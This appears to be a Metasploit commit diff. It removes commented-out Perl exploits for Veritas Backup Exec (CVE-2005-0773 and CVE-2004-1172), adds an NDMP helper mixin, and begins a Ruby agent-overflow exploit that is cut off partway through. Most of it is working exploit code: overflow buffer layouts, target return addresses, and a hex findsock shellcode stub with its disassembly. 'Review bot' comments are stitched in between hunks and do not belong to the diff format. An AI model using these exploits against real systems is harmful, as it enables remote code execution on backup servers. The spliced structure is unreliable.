Bug fixes for alphanum vs alphanumeric
Added some target print code to the brightstor exploits. Added the backupexec exploits. git-svn-id: file:///home/svn/incoming/trunk@3132 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
af19802cc0
commit
7624b4d78a
|
@ -1,272 +0,0 @@
|
|||
require 'msf/core'
|
||||
|
||||
module Msf
|
||||
|
||||
class Exploits::Windows::XXX_CHANGEME_XXX < Msf::Exploit::Remote
|
||||
|
||||
include Exploit::Remote::Tcp
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Veritas Backup Exec Windows Remote Agent Overflow',
|
||||
'Description' => %q{
|
||||
This module exploits a stack overflow in the Veritas
|
||||
BackupExec Windows Agent software. This vulnerability occurs
|
||||
when a client authentication request is received with type
|
||||
'3' and a long password argument. Reliable execution is
|
||||
obtained by abusing the stack overflow to smash a SEH
|
||||
pointer.
|
||||
|
||||
},
|
||||
'Author' => [ 'hdm' ],
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2005-0773'],
|
||||
[ 'URL', 'http://www.idefense.com/application/poi/display?id=272&type=vulnerabilities'],
|
||||
[ 'URL', 'http://seer.support.veritas.com/docs/276604.htm'],
|
||||
[ 'MIL', '9'],
|
||||
|
||||
],
|
||||
'Privileged' => true,
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 1024,
|
||||
'BadChars' => "\x00",
|
||||
'Prepend' => "\x81\xc4\x54\xf2\xff\xff",
|
||||
|
||||
},
|
||||
'Targets' =>
|
||||
[
|
||||
[
|
||||
'Automatic Targetting',
|
||||
{
|
||||
'Platform' => 'win32, winnt, win2000, winxp, win2003',
|
||||
'Ret' => 0x0,
|
||||
},
|
||||
],
|
||||
],
|
||||
'DisclosureDate' => '',
|
||||
'DefaultTarget' => 0))
|
||||
end
|
||||
|
||||
def exploit
|
||||
connect
|
||||
|
||||
handler
|
||||
disconnect
|
||||
end
|
||||
|
||||
=begin
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be redistributed
|
||||
# according to the licenses defined in the Authors field below. In the
|
||||
# case of an unknown or missing license, this file defaults to the same
|
||||
# license as the core Framework (dual GPLv2 and Artistic). The latest
|
||||
# version of the Framework can always be obtained from metasploit.com.
|
||||
##
|
||||
|
||||
package Msf::Exploit::backupexec_agent;
|
||||
use base "Msf::Exploit";
|
||||
use strict;
|
||||
use Pex::Text;
|
||||
|
||||
my $advanced = { };
|
||||
|
||||
my $info =
|
||||
{
|
||||
'Name' => 'Veritas Backup Exec Windows Remote Agent Overflow',
|
||||
'Version' => '$Revision$',
|
||||
'Authors' => [ 'Thor Doomen <syscall [at] hushmail.com>' ],
|
||||
'Arch' => [ 'x86' ],
|
||||
'OS' => [ 'win32', 'winnt', 'win2000', 'winxp', 'win2003' ],
|
||||
'Priv' => 1,
|
||||
|
||||
'AutoOpts' => { 'EXITFUNC' => 'process' },
|
||||
|
||||
'UserOpts' =>
|
||||
{
|
||||
'RHOST' => [1, 'ADDR', 'The target address'],
|
||||
'RPORT' => [1, 'PORT', 'The target port', 10000],
|
||||
},
|
||||
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 1024,
|
||||
'BadChars' => "\x00",
|
||||
'Keys' => ['+ws2ord'],
|
||||
'Prepend' => "\x81\xc4\x54\xf2\xff\xff", # add esp, -3500
|
||||
},
|
||||
|
||||
'Description' => Pex::Text::Freeform(qq{
|
||||
This module exploits a stack overflow in the Veritas BackupExec Windows
|
||||
Agent software. This vulnerability occurs when a client authentication request
|
||||
is received with type '3' and a long password argument. Reliable execution is
|
||||
obtained by abusing the stack overflow to smash a SEH pointer.
|
||||
}),
|
||||
|
||||
'Refs' =>
|
||||
[
|
||||
['CVE', '2005-0773' ],
|
||||
['URL', 'http://www.idefense.com/application/poi/display?id=272&type=vulnerabilities'],
|
||||
['URL', 'http://seer.support.veritas.com/docs/276604.htm' ],
|
||||
['MIL', '9'],
|
||||
],
|
||||
|
||||
'DefaultTarget' => 0,
|
||||
'Targets' =>
|
||||
[
|
||||
['Veritas BE 9.0/9.1/10.0 (All Windows)', 0x0140f8d5, 0x014261b0 ],
|
||||
['Veritas BE 9.0/9.1/10.0 (Windows 2000)', 0x75022ac4, 0x75022ac4 ],
|
||||
],
|
||||
|
||||
'Keys' => ['veritas'],
|
||||
};
|
||||
|
||||
sub new {
|
||||
my $class = shift;
|
||||
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
|
||||
return($self);
|
||||
}
|
||||
|
||||
# Version 4.2 -> 9.1
|
||||
# Version 5.1 -> 10.0
|
||||
sub Check {
|
||||
my $self = shift;
|
||||
my ($vend, $prod, $vers) = $self->GetVersion;
|
||||
|
||||
if (! $vend) {
|
||||
$self->PrintLine("[*] Could not determine the version number");
|
||||
return $self->CheckCode('Unknown');
|
||||
}
|
||||
|
||||
$self->PrintLine("[*] $prod Version $vers ($vend)");
|
||||
return $self->CheckCode('Detected');
|
||||
}
|
||||
|
||||
sub Exploit {
|
||||
my $self = shift;
|
||||
my $target_host = $self->GetVar('RHOST');
|
||||
my $target_port = $self->GetVar('RPORT');
|
||||
my $target_idx = $self->GetVar('TARGET');
|
||||
my $shellcode = $self->GetVar('EncodedPayload')->Payload;
|
||||
my $target = $self->Targets->[$target_idx];
|
||||
|
||||
$self->PrintLine( "[*] Attempting to exploit " . $target->[0] );
|
||||
|
||||
my $s = Msf::Socket::Tcp->new(
|
||||
'PeerAddr' => $target_host,
|
||||
'PeerPort' => $target_port,
|
||||
'LocalPort' => $self->GetVar('CPORT'),
|
||||
'SSL' => $self->GetVar('SSL'),
|
||||
);
|
||||
|
||||
if ( $s->IsError ) {
|
||||
$self->PrintLine( '[*] Error creating socket: ' . $s->GetError );
|
||||
return;
|
||||
}
|
||||
|
||||
my $res = $s->Recv(4, 5);
|
||||
$res = $s->Recv(unpack('N', $res) - 0x80000000, 5);
|
||||
|
||||
my $username = "X" x 512;
|
||||
my $password = Pex::Text::PatternCreate(8192);
|
||||
|
||||
# Place our payload early in the request and jump backwards into it
|
||||
substr($password, 3536-length($shellcode), length($shellcode), $shellcode);
|
||||
|
||||
# This offset is required for version 10.0
|
||||
substr($password, 3536, 2, "\xeb\x06");
|
||||
substr($password, 3540, 4, pack('V', $target->[2]) );
|
||||
substr($password, 3544, 5, "\xe9" . pack('V', -1037));
|
||||
|
||||
# This offset is required for version 9.0/9.1
|
||||
substr($password, 4524, 2, "\xeb\x06");
|
||||
substr($password, 4528, 4, pack('V', $target->[1]) );
|
||||
substr($password, 4532, 5, "\xe9" . pack('V', -2025));
|
||||
|
||||
my $conn_auth =
|
||||
pack('N', 1). # Sequence number
|
||||
pack('N', time()). # Current time
|
||||
pack('N', 0). # Message type (request)
|
||||
pack('N', 0x901). # Message name (connect_client_auth)
|
||||
pack('N', 0). # Reply sequence number
|
||||
pack('N', 0). # Error status
|
||||
pack('N', 3). # Authentication type
|
||||
pack('N', length($username)).
|
||||
$username.
|
||||
pack('N', length($password)).
|
||||
$password.
|
||||
pack('N', 4);
|
||||
|
||||
$self->PrintLine( "[*] Sending authentication request of " . length($conn_auth) . " bytes..." );
|
||||
$s->Send(pack('N', 0x80000000 + length($conn_auth)) . $conn_auth);
|
||||
|
||||
return;
|
||||
}
|
||||
|
||||
sub GetVersion {
|
||||
my $self = shift;
|
||||
my $target_host = $self->GetVar('RHOST');
|
||||
my $target_port = $self->GetVar('RPORT');
|
||||
|
||||
my $s = Msf::Socket::Tcp->new(
|
||||
'PeerAddr' => $target_host,
|
||||
'PeerPort' => $target_port,
|
||||
'LocalPort' => $self->GetVar('CPORT'),
|
||||
'SSL' => $self->GetVar('SSL'),
|
||||
);
|
||||
|
||||
if ( $s->IsError ) {
|
||||
$self->PrintLine( '[*] Error creating socket: ' . $s->GetError );
|
||||
return undef;
|
||||
}
|
||||
|
||||
my $res = $s->Recv(4, 5);
|
||||
return undef if ! $res;
|
||||
$res = $s->Recv(unpack('N', $res) - 0x80000000, 5);
|
||||
|
||||
my $serv_info =
|
||||
pack('N', 1). # Sequence number
|
||||
pack('N', time()). # Current time
|
||||
pack('N', 0). # Message type (request)
|
||||
pack('N', 0x108). # Message name (connect_client_auth)
|
||||
pack('N', 0). # Reply sequence number
|
||||
pack('N', 0); # Error status
|
||||
|
||||
$s->Send(pack('N', 0x80000000 + length($serv_info)) . $serv_info);
|
||||
$res = $s->Recv(4, 5);
|
||||
return undef if ! $res;
|
||||
|
||||
$res = $s->Recv(unpack('N', $res) - 0x80000000, 5);
|
||||
$s->Close;
|
||||
|
||||
# Skip past the protocols headers
|
||||
$res = substr($res, 28);
|
||||
|
||||
# Vendor
|
||||
my $vend_len = unpack('N', substr($res, 0, 4));
|
||||
my $vend = substr($res, 4, $vend_len);
|
||||
$res = substr($res, 4 + $vend_len + 1);
|
||||
|
||||
# Product
|
||||
my $prod_len = unpack('N', substr($res, 0, 4));
|
||||
my $prod = substr($res, 4, $prod_len);
|
||||
$res = substr($res, 4 + $prod_len + 1);
|
||||
|
||||
# Version
|
||||
my $vers_len = unpack('N', substr($res, 0, 4));
|
||||
my $vers = substr($res, 4, $vers_len);
|
||||
$res = substr($res, 4 + $vers_len + 1);
|
||||
|
||||
return ($vend, $prod, $vers);
|
||||
}
|
||||
|
||||
1;
|
||||
|
||||
=end
|
||||
|
||||
|
||||
end
|
||||
end
|
|
@ -1,243 +0,0 @@
|
|||
require 'msf/core'
|
||||
|
||||
module Msf
|
||||
|
||||
class Exploits::Windows::XXX_CHANGEME_XXX < Msf::Exploit::Remote
|
||||
|
||||
include Exploit::Remote::Tcp
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Veritas Backup Exec Name Service Overflow',
|
||||
'Description' => %q{
|
||||
This module exploits a vulnerability in the Veritas Backup
|
||||
Exec Agent Browser service. This vulnerability occurs when a
|
||||
recv() call has a length value too long for the destination
|
||||
stack buffer. By sending an agent name value of 63 bytes or
|
||||
more, we can overwrite the return address of the recv
|
||||
function. Since we only have ~60 bytes of contiguous space
|
||||
for shellcode, a tiny findsock payload is sent which uses a
|
||||
hardcoded IAT address for the recv() function. This payload
|
||||
will then roll the stack back to the beginning of the page,
|
||||
recv() the real shellcode into it, and jump to it. This
|
||||
module has been tested against Veritas 9.1 SP0, 9.1 SP1, and
|
||||
8.6.
|
||||
|
||||
},
|
||||
'Author' => [ 'hdm' ],
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
[
|
||||
[ 'OSVDB', '12418'],
|
||||
[ 'CVE', '2004-1172'],
|
||||
[ 'URL', 'http://www.idefense.com/application/poi/display?id=169&type=vulnerabilities'],
|
||||
[ 'MIL', '10'],
|
||||
|
||||
],
|
||||
'Privileged' => true,
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 1024,
|
||||
'BadChars' => "",
|
||||
'MinNops' => 512,
|
||||
'MinNops' => 512,
|
||||
'Prepend' => "\x81\xc4\x54\xf2\xff\xff",
|
||||
|
||||
},
|
||||
'Targets' =>
|
||||
[
|
||||
[
|
||||
'Automatic Targetting',
|
||||
{
|
||||
'Platform' => 'win32, win2000, winxp, win2003',
|
||||
'Ret' => 0x0,
|
||||
},
|
||||
],
|
||||
],
|
||||
'DisclosureDate' => 'Dec 16 2004',
|
||||
'DefaultTarget' => 0))
|
||||
end
|
||||
|
||||
def exploit
|
||||
connect
|
||||
|
||||
handler
|
||||
disconnect
|
||||
end
|
||||
|
||||
=begin
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be redistributed
|
||||
# according to the licenses defined in the Authors field below. In the
|
||||
# case of an unknown or missing license, this file defaults to the same
|
||||
# license as the core Framework (dual GPLv2 and Artistic). The latest
|
||||
# version of the Framework can always be obtained from metasploit.com.
|
||||
##
|
||||
|
||||
package Msf::Exploit::backupexec_ns;
|
||||
use base "Msf::Exploit";
|
||||
use strict;
|
||||
use Pex::Text;
|
||||
|
||||
my $advanced = { };
|
||||
|
||||
my $info =
|
||||
{
|
||||
'Name' => 'Veritas Backup Exec Name Service Overflow',
|
||||
'Version' => '$Revision$',
|
||||
'Authors' => [ 'Thor Doomen <syscall [at] hushmail.com>' ],
|
||||
'Arch' => [ 'x86' ],
|
||||
'OS' => [ 'win32', 'win2000', 'winxp', 'win2003' ],
|
||||
'Priv' => 1,
|
||||
|
||||
'AutoOpts' => { 'EXITFUNC' => 'process' },
|
||||
|
||||
'UserOpts' =>
|
||||
{
|
||||
'RHOST' => [1, 'ADDR', 'The target address'],
|
||||
'RPORT' => [1, 'PORT', 'The target port', 6101],
|
||||
},
|
||||
|
||||
'Payload' =>
|
||||
{
|
||||
'MinNops' => 512,
|
||||
'MaxNops' => 512,
|
||||
'Space' => 1024,
|
||||
'BadChars' => '',
|
||||
'Prepend' => "\x81\xc4\x54\xf2\xff\xff", # add esp, -3500
|
||||
'Keys' => ['+ws2ord'],
|
||||
},
|
||||
|
||||
'Description' => Pex::Text::Freeform(qq{
|
||||
This module exploits a vulnerability in the Veritas Backup Exec
|
||||
Agent Browser service. This vulnerability occurs when a recv() call
|
||||
has a length value too long for the destination stack buffer. By
|
||||
sending an agent name value of 63 bytes or more, we can overwrite
|
||||
the return address of the recv function. Since we only have ~60
|
||||
bytes of contiguous space for shellcode, a tiny findsock payload
|
||||
is sent which uses a hardcoded IAT address for the recv() function.
|
||||
This payload will then roll the stack back to the beginning of
|
||||
the page, recv() the real shellcode into it, and jump to it.
|
||||
This module has been tested against Veritas 9.1 SP0, 9.1 SP1,
|
||||
and 8.6.
|
||||
}),
|
||||
|
||||
'Refs' =>
|
||||
[
|
||||
['OSVDB', '12418'],
|
||||
['CVE', '2004-1172'],
|
||||
['URL', 'http://www.idefense.com/application/poi/display?id=169&type=vulnerabilities'],
|
||||
['MIL', '10'],
|
||||
],
|
||||
|
||||
'Targets' =>
|
||||
[ # BackupExec 9.1 SP0/SP1 return contributed by class101
|
||||
['Veritas BE 9.1 SP0/SP1', 0x0142ffa1, 0x401150FF], # recv@bnetns.exe v9.1.4691.0 | esi@bnetns.exe
|
||||
['Veritas BE 8.5 ', 0x014308b9, 0x401138FF], # recv@bnetns.exe v8.50.3572 | esi@beclass.dll v8.50.3572
|
||||
],
|
||||
|
||||
'Keys' => ['veritas'],
|
||||
|
||||
'DisclosureDate' => 'Dec 16 2004',
|
||||
};
|
||||
|
||||
sub new {
|
||||
my $class = shift;
|
||||
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
|
||||
return($self);
|
||||
}
|
||||
|
||||
sub Exploit {
|
||||
my $self = shift;
|
||||
my $target_host = $self->GetVar('RHOST');
|
||||
my $target_port = $self->GetVar('RPORT');
|
||||
my $target_idx = $self->GetVar('TARGET');
|
||||
my $shellcode = $self->GetVar('EncodedPayload')->Payload;
|
||||
my $target = $self->Targets->[$target_idx];
|
||||
|
||||
$self->PrintLine( "[*] Attempting to exploit " . $target->[0] );
|
||||
|
||||
my $s = Msf::Socket::Tcp->new(
|
||||
'PeerAddr' => $target_host,
|
||||
'PeerPort' => $target_port,
|
||||
'LocalPort' => $self->GetVar('CPORT'),
|
||||
'SSL' => $self->GetVar('SSL'),
|
||||
);
|
||||
|
||||
if ( $s->IsError ) {
|
||||
$self->PrintLine( '[*] Error creating socket: ' . $s->GetError );
|
||||
return;
|
||||
}
|
||||
|
||||
my $code = "\xfc" x 112;
|
||||
|
||||
# This will findsock/read the real shellcode (51 bytes, harcoded IAT for recv)
|
||||
# The IAT for recv() is for bnetns, the address is shifted by 8 bits to avoid
|
||||
# nulls: [0x00401150 -> 0x401150FF]
|
||||
my $read =
|
||||
"\x31\xf6\xc1\xec\x0c\xc1\xe4\x0c\x89\xe7\x89\xfb\x6a\x01\x8b\x74".
|
||||
"\x24\xfe\x31\xd2\x52\x42\xc1\xe2\x10\x52\x57\x56\xb8\xff\x50\x11".
|
||||
"\x40\xc1\xe8\x08\xff\x10\x85\xc0\x79\x07\x89\xdc\x4e\x85\xf6\x75".
|
||||
"\xe1\xff\xd7";
|
||||
|
||||
# Configure the IAT for the recv call
|
||||
substr($read, 29, 4, pack('V', $target->[2]));
|
||||
|
||||
# Stuff it all into the request...
|
||||
substr( $code, 2, length($read), $read );
|
||||
|
||||
# Return address to use (jmp esi)
|
||||
substr( $code, 66, 4, pack('V', $target->[1]) );
|
||||
|
||||
# The registration request
|
||||
my $req =
|
||||
"\x02\x00\x32\x00\x20\x00" . $code . "\x00".
|
||||
"1.1.1.1.1.1\x00".
|
||||
"\xeb\x81";
|
||||
|
||||
$self->PrintLine( "[*] Sending agent registration request of " . length($req) . " bytes..." );
|
||||
$s->Send($req);
|
||||
|
||||
$self->PrintLine( "[*] Sending final payload of " . length($req) . " bytes..." );
|
||||
$s->Send($shellcode);
|
||||
|
||||
sleep(2);
|
||||
$self->PrintLine("[*] Waiting for a response...");
|
||||
return;
|
||||
}
|
||||
|
||||
my $findsock = q{
|
||||
00000000 31F6 xor esi,esi
|
||||
00000002 C1EC0C shr esp,0xc
|
||||
00000005 C1E40C shl esp,0xc
|
||||
00000008 89E7 mov edi,esp
|
||||
0000000A 89FB mov ebx,edi
|
||||
0000000C 6A01 push byte +0x1
|
||||
0000000E 8B7424FE mov esi,[esp-0x2]
|
||||
00000012 31D2 xor edx,edx
|
||||
00000014 52 push edx
|
||||
00000015 42 inc edx
|
||||
00000016 C1E210 shl edx,0x10
|
||||
00000019 52 push edx
|
||||
0000001A 57 push edi
|
||||
0000001B 56 push esi
|
||||
0000001C B8FF501140 mov eax,0x401150ff
|
||||
00000021 C1E808 shr eax,0x8
|
||||
00000024 FF10 call near [eax]
|
||||
00000026 85C0 test eax,eax
|
||||
00000028 7907 jns 0x31
|
||||
0000002A 89DC mov esp,ebx
|
||||
0000002C 4E dec esi
|
||||
0000002D 85F6 test esi,esi
|
||||
0000002F 75E1 jnz 0x12
|
||||
00000031 FFD7 call edi
|
||||
};
|
||||
|
||||
1;
|
||||
|
||||
=end
|
||||
|
||||
|
||||
end
|
||||
end
|
|
@ -213,7 +213,8 @@ class Exploit < Msf::Module
|
|||
require 'msf/core/exploit/dcerpc'
|
||||
require 'msf/core/exploit/mssql'
|
||||
require 'msf/core/exploit/arkeia'
|
||||
|
||||
require 'msf/core/exploit/ndmp'
|
||||
|
||||
#
|
||||
# Creates an instance of the exploit module. Mad skillz.
|
||||
#
|
||||
|
|
|
@ -28,6 +28,14 @@ module Exploit::Remote::Arkeia
|
|||
end
|
||||
|
||||
|
||||
#
|
||||
# Flush the receive buffer on a new connection
|
||||
#
|
||||
def connect
|
||||
super
|
||||
self.recv_buff = ''
|
||||
end
|
||||
|
||||
#
|
||||
# This method dumps some information about the service
|
||||
#
|
||||
|
@ -38,7 +46,8 @@ module Exploit::Remote::Arkeia
|
|||
resp = ''
|
||||
|
||||
# Authenticate1
|
||||
req = "\x00\x41\x00\x00\x00\x00\x00\x73"+
|
||||
req =
|
||||
"\x00\x41\x00\x00\x00\x00\x00\x73"+
|
||||
"\x00\x00\x00\x00\x00\x00\x00\x00"+
|
||||
"\x00\x00\x00\x00\x7f\x00\x00\x01"+
|
||||
"\x00\x00\x00\x00\x00\x00\x00\x00"+
|
||||
|
@ -63,7 +72,8 @@ module Exploit::Remote::Arkeia
|
|||
end
|
||||
|
||||
# Authenticate2
|
||||
req = "\x00\x73\x00\x00\x00\x00\x00\x0c" +
|
||||
req =
|
||||
"\x00\x73\x00\x00\x00\x00\x00\x0c" +
|
||||
"\x32\x00\x00\x00\x00\x00\x00\x00" +
|
||||
"\x00\x00\x00\x00"
|
||||
|
||||
|
@ -75,7 +85,8 @@ module Exploit::Remote::Arkeia
|
|||
end
|
||||
|
||||
# SessionSetup1
|
||||
req = "\x00\x61\x00\x04\x00\x01\x00\x15"+
|
||||
req =
|
||||
"\x00\x61\x00\x04\x00\x01\x00\x15"+
|
||||
"\x00\x00\x31\x35\x33\x39\x38\x00"+
|
||||
"\x45\x4e\x00\x00\x00\x00\x00\x00"+
|
||||
"\x00\x00\x00\x00\x00"
|
||||
|
@ -88,7 +99,8 @@ module Exploit::Remote::Arkeia
|
|||
end
|
||||
|
||||
# Begin the ARKADMIN_GET_CLIENT_INFO request
|
||||
req = "\x00\x62\x00\x01\x00\x02\x00\x25"+
|
||||
req =
|
||||
"\x00\x62\x00\x01\x00\x02\x00\x25"+
|
||||
"\x41\x52\x4b\x41\x44\x4d\x49\x4e"+
|
||||
"\x5f\x47\x45\x54\x5f\x43\x4c\x49"+
|
||||
"\x45\x4e\x54\x5f\x49\x4e\x46\x4f"+
|
||||
|
@ -103,7 +115,8 @@ module Exploit::Remote::Arkeia
|
|||
end
|
||||
|
||||
# Complete the ARKADMIN_GET_CLIENT_INFO request
|
||||
req = "\x00\x63\x00\x04\x00\x03\x00\x11"+
|
||||
req =
|
||||
"\x00\x63\x00\x04\x00\x03\x00\x11"+
|
||||
"\x30\x00\x31\x00\x32\x00\x00\x00"+
|
||||
"\x00\x00\x00\x00\x00\x00\x00\x00"+
|
||||
"\x00"
|
||||
|
@ -129,7 +142,8 @@ module Exploit::Remote::Arkeia
|
|||
info['Hostname'] = mver[1] if mver
|
||||
|
||||
# Begin the ARKADMIN_GET_MACHINE_INFO request
|
||||
req = "\x00\x62\x00\x01\x00\x02\x00\x26"+
|
||||
req =
|
||||
"\x00\x62\x00\x01\x00\x02\x00\x26"+
|
||||
"\x41\x52\x4b\x41\x44\x4d\x49\x4e"+
|
||||
"\x5f\x47\x45\x54\x5f\x4d\x41\x43"+
|
||||
"\x48\x49\x4e\x45\x5f\x49\x4e\x46"+
|
||||
|
@ -148,7 +162,8 @@ module Exploit::Remote::Arkeia
|
|||
end
|
||||
|
||||
# Complete the ARKADMIN_GET_MACHINE_INFO request
|
||||
req = "\x00\x63\x00\x04\x00\x03\x00\x11"+
|
||||
req =
|
||||
"\x00\x63\x00\x04\x00\x03\x00\x11"+
|
||||
"\x30\x00\x31\x00\x33\x00\x00\x00"+
|
||||
"\x00\x00\x00\x00\x00\x00\x00\x00"+
|
||||
"\x00"
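Review bot: The new `connect` override in the first hunk of this file ends with `self.recv_buff = ''`, so its return value is the empty string rather than whatever `super` returned; if the Tcp mixin's `connect` hands back the socket, as a caller written `s = connect` would expect, this override silently changes that. Capture and return it: `nsock = super`, `self.recv_buff = ''`, `return nsock`. The same shape appears in the new NDMP mixin's `connect` added by this commit. The enclosing module continues outside the hunk.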
|
||||
|
|
|
@ -0,0 +1,118 @@
|
|||
require 'msf/core'
|
||||
|
||||
module Msf
|
||||
|
||||
###
|
||||
#
|
||||
# This module exposes methods for accessing NDMP services
|
||||
#
|
||||
###
|
||||
module Exploit::Remote::NDMP
|
||||
|
||||
include Exploit::Remote::Tcp
|
||||
|
||||
#
|
||||
# Creates an instance of a MSSQL exploit module.
|
||||
#
|
||||
def initialize(info = {})
|
||||
super
|
||||
|
||||
# Register the options that all FTP exploits may make use of.
|
||||
register_options(
|
||||
[
|
||||
Opt::RHOST,
|
||||
Opt::RPORT(10000),
|
||||
], Msf::Exploit::Remote::NDMP)
|
||||
|
||||
self.recv_buff = ''
|
||||
end
|
||||
|
||||
#
|
||||
# Flush the receive buffer on a new connection
|
||||
#
|
||||
def connect
|
||||
super
|
||||
self.recv_buff = ''
|
||||
end
|
||||
|
||||
#
|
||||
# This method dumps ndmp version information
|
||||
#
|
||||
def ndmp_info
|
||||
connect
|
||||
req = [
|
||||
1, # Sequence number
|
||||
Time.now.to_i, # Current time
|
||||
0, # Message type (request)
|
||||
0x108, # Message name (version)
|
||||
0, # Reply sequence number
|
||||
0, # Error status
|
||||
].pack('NNNNNN')
|
||||
|
||||
resp = ndmp_recv()
|
||||
ndmp_send(req)
|
||||
resp = ndmp_recv()
|
||||
disconnect
|
||||
|
||||
if (not (resp and resp.length > 28))
|
||||
return false
|
||||
end
|
||||
|
||||
info = { }
|
||||
|
||||
i = 32
|
||||
|
||||
vend_len = resp[i, 4].unpack('N')[0]
|
||||
vend = resp[i + 4, vend_len]
|
||||
i += vend_len + 4 + 1
|
||||
|
||||
prod_len = resp[i, 4].unpack('N')[0]
|
||||
prod = resp[i + 4, prod_len]
|
||||
i += prod_len + 4 + 1
|
||||
|
||||
vers_len = resp[i, 4].unpack('N')[0]
|
||||
vers = resp[i + 4, vers_len]
|
||||
i += vers_len + 4 + 1
|
||||
|
||||
info['Version'] = vers
|
||||
info['Product'] = prod
|
||||
info['Vendor'] = vend
|
||||
|
||||
return info
|
||||
end
|
||||
|
||||
#
|
||||
# This method reads from the socket and parses out a single
|
||||
# NDMP response, buffering the rest
|
||||
#
|
||||
def ndmp_recv(nsock = self.sock)
|
||||
if (self.recv_buff.length < 4)
|
||||
self.recv_buff << (sock.get_once || '')
|
||||
end
|
||||
|
||||
if (self.recv_buff.length < 4)
|
||||
return false
|
||||
end
|
||||
|
||||
# Read the length header out of the message
|
||||
dlen = self.recv_buff[0, 4].unpack('N')[0] & 0x7fffffff
|
||||
|
||||
# Do we have the entire response message?
|
||||
if (self.recv_buff.length >= dlen + 4)
|
||||
return self.recv_buff.slice!(0, dlen + 4)
|
||||
end
|
||||
|
||||
return false
|
||||
end
|
||||
|
||||
#
|
||||
# This method tacks a length header on a packet then sends
|
||||
# it out the socket
|
||||
#
|
||||
def ndmp_send(data, nsock = self.sock)
|
||||
nsock.put( [ data.length + 0x80000000 ].pack('N') + data )
|
||||
end
|
||||
|
||||
attr_accessor :recv_buff
|
||||
end
|
||||
end
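Review bot: `ndmp_info` guards on `resp.length > 28` but then reads from offset 32, and every later `resp[i, 4]` uses a length taken from the server's own reply, so a short or malformed response makes `resp[i, 4]` nil and the following `.unpack` raises instead of returning false; bound each read against the bytes actually received, as in the excerpt below. Separately, `ndmp_recv` takes `nsock` but reads from `sock` on the line `self.recv_buff << (sock.get_once || '')`; it should be `nsock.get_once` so the parameter means something. The header comments `Creates an instance of a MSSQL exploit module.` and `Register the options that all FTP exploits may make use of.` were carried over from another mixin and should say NDMP.
```ruby
    # … unchanged: ndmp_recv/ndmp_send exchange, disconnect, length guard …
    info = { }
    i = 32

    # Each field is a 4-byte big-endian length, the field bytes, then one
    # skipped byte; the lengths are server-supplied, so check them against
    # what was actually received before indexing.
    ['Vendor', 'Product', 'Version'].each do |key|
      return false if (resp.length < i + 4)
      flen = resp[i, 4].unpack('N')[0]
      return false if (resp.length < i + 4 + flen)
      info[key] = resp[i + 4, flen]
      i += flen + 4 + 1
    end

    return info
```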
|
|
@ -81,6 +81,9 @@ class Exploits::Windows::Arkeia::ArkeiaType77Overflow < Msf::Exploit::Remote
|
|||
|
||||
def exploit
|
||||
connect
|
||||
|
||||
print_status("Trying target #{target.name}...")
|
||||
|
||||
head = "\x00\x4d\x00\x03\x00\x01\xff\xff"
|
||||
data = (target['Rets'][1] == 5) ? prep_ark5() : prep_ark4()
|
||||
head[6, 2] = [data.length].pack('n')
|
||||
|
|
|
@ -0,0 +1,126 @@
|
|||
require 'msf/core'
|
||||
|
||||
module Msf
|
||||
|
||||
class Exploits::Windows::Backupexec::BackupExecAgentOverflow < Msf::Exploit::Remote
|
||||
|
||||
include Exploit::Remote::NDMP
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Veritas Backup Exec Windows Remote Agent Overflow',
|
||||
'Description' => %q{
|
||||
This module exploits a stack overflow in the Veritas
|
||||
BackupExec Windows Agent software. This vulnerability occurs
|
||||
when a client authentication request is received with type
|
||||
'3' and a long password argument. Reliable execution is
|
||||
obtained by abusing the stack overflow to smash a SEH
|
||||
pointer.
|
||||
},
|
||||
'Author' => [ 'hdm' ],
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2005-0773'],
|
||||
[ 'URL', 'http://www.idefense.com/application/poi/display?id=272&type=vulnerabilities'],
|
||||
[ 'URL', 'http://seer.support.veritas.com/docs/276604.htm'],
|
||||
[ 'MIL', '9'],
|
||||
|
||||
],
|
||||
'Privileged' => true,
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'EXITFUNC' => 'process',
|
||||
},
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 1024,
|
||||
'BadChars' => "\x00",
|
||||
'StackAdjustment' => -3500,
|
||||
},
|
||||
'Targets' =>
|
||||
[
|
||||
[
|
||||
'Veritas BE 9.0/9.1/10.0 (All Windows)',
|
||||
{
|
||||
'Platform' => 'win',
|
||||
'Rets' => [ 0x0140f8d5, 0x014261b0 ],
|
||||
},
|
||||
],
|
||||
[
|
||||
'Veritas BE 9.0/9.1/10.0 (Windows 2000)',
|
||||
{
|
||||
'Platform' => 'win',
|
||||
'Rets' => [ 0x75022ac4, 0x75022ac4 ],
|
||||
},
|
||||
],
|
||||
],
|
||||
'DisclosureDate' => '',
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(10000)
|
||||
], self)
|
||||
end
|
||||
|
||||
def check
|
||||
info = ndmp_info()
|
||||
if (info and info['Version'])
|
||||
print_status(" Vendor: #{info['Vendor']}")
|
||||
print_status("Product: #{info['Product']}")
|
||||
print_status("Version: #{info['Version']}")
|
||||
|
||||
if (info['Vendor'] =~ /VERITAS/i and info['Version'] =~ /^(4\.2|5\.1)$/)
|
||||
return Exploit::CheckCode::Detected
|
||||
end
|
||||
end
|
||||
return Exploit::CheckCode::Safe
|
||||
end
|
||||
|
||||
def exploit
|
||||
connect
|
||||
|
||||
print_status("Trying target #{target.name}...")
|
||||
|
||||
resp = ndmp_recv()
|
||||
|
||||
username = 'X' * 512
|
||||
password = Rex::Text.rand_text_alphanumeric(8192)
|
||||
|
||||
